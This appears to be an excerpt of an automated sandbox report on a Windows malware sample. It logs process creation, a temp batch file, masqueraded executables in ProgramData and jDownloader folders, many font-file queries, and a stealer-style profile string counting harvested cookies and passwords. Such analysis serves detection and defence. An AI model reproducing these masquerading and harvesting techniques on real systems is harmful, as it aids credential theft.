Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"	Jump to behavior

Source: cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"15"},"5.0.4",5,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\SoftwareDistribution","PLTWRW (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]<

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0037F654 cpuid

0_2_0037F654

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0037AF0F

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Queries volume information: C:\hyperComponentFontDhcp\Mscommon.exe VolumeInformation	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
